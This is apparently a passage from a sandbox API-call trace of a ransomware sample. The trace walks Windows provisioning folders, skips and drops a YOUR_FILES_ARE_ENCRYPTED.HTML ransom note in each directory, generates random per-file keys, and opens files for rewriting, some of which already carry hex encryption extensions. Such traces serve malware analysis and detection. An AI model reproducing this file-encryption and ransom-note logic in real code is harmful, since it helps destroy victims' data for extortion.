lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.139] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef16d98, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef16d98, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{ee4aac98-c174-4941-82b1-d121e493e4fb}", cAlternateFileName="{EE4AA~1")) returned 1 [0110.139] StrStrIW (lpFirst="{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.139] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned 84 [0110.139] GetProcessHeap () returned 0x600000 [0110.139] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.140] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}" [0110.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*" [0110.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef16d98, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef16d98, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.140] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef16d98, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef16d98, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.140] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18f51ef, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18f51ef, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaef1d706, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D", cAlternateFileName="CUSTOM~1.5A6")) returned 1 [0110.140] StrStrIW (lpFirst="customizations.xml.5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.140] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D") returned 168 [0110.140] PathFindExtensionW (pszPath="customizations.xml.5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D") returned=".5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D" [0110.140] lstrlenW (lpString=".5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D") returned 65 [0110.140] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18cef80, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18cef80, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18cef80, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.140] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.140] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml") returned 104 [0110.140] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.140] lstrlenW (lpString=".xml") returned 4 [0110.140] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.140] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.141] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.141] CloseHandle (hObject=0x30c) returned 1 [0110.141] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.141] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.141] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned 89 [0110.141] GetProcessHeap () returned 0x600000 [0110.141] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.142] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov" [0110.142] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*" [0110.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeef5db1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0110.142] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeef5db1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.142] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.142] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.142] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime") returned 97 [0110.142] GetProcessHeap () returned 0x600000 [0110.142] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.143] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime" [0110.143] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*" [0110.143] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeeed505, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f461c, dwReserved1=0x6f4568, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.143] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeeed505, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f461c, dwReserved1=0x6f4568, cFileName="..", cAlternateFileName="")) returned 1 [0110.143] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1882aa2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1882aa2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x6f461c, dwReserved1=0x6f4568, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.143] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.143] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.143] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.143] lstrlenW (lpString=".provxml") returned 8 [0110.143] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.143] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeeed505, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeeed505, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeef0f31, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f461c, dwReserved1=0x6f4568, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.143] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeeed505, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeeed505, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeef0f31, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f461c, dwReserved1=0x6f4568, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.144] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.144] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.144] GetProcessHeap () returned 0x600000 [0110.144] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.144] GetProcessHeap () returned 0x600000 [0110.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.144] GetProcessHeap () returned 0x600000 [0110.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.145] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18a8d11, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18a8d11, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.145] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.145] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml") returned 101 [0110.145] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.145] lstrlenW (lpString=".xml") returned 4 [0110.145] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.145] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.145] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=348) returned 1 [0110.145] CloseHandle (hObject=0x32c) returned 1 [0110.145] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeef5db1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeef5db1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeef97ec, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.145] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeef5db1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeef5db1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeef97ec, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.145] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0110.146] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.146] GetProcessHeap () returned 0x600000 [0110.146] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.146] GetProcessHeap () returned 0x600000 [0110.146] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.146] GetProcessHeap () returned 0x600000 [0110.146] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.147] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeefd392, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeefd392, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef00e16, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.147] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeefd392, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeefd392, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef00e16, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.147] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.147] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.147] GetProcessHeap () returned 0x600000 [0110.147] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.148] GetProcessHeap () returned 0x600000 [0110.148] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.148] GetProcessHeap () returned 0x600000 [0110.148] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.148] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef341ca, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef341ca, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", cAlternateFileName="{F1189~1")) returned 1 [0110.148] StrStrIW (lpFirst="{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.148] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned 84 [0110.148] GetProcessHeap () returned 0x600000 [0110.149] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.149] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}" [0110.149] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*" [0110.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef341ca, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef57809, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.150] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, 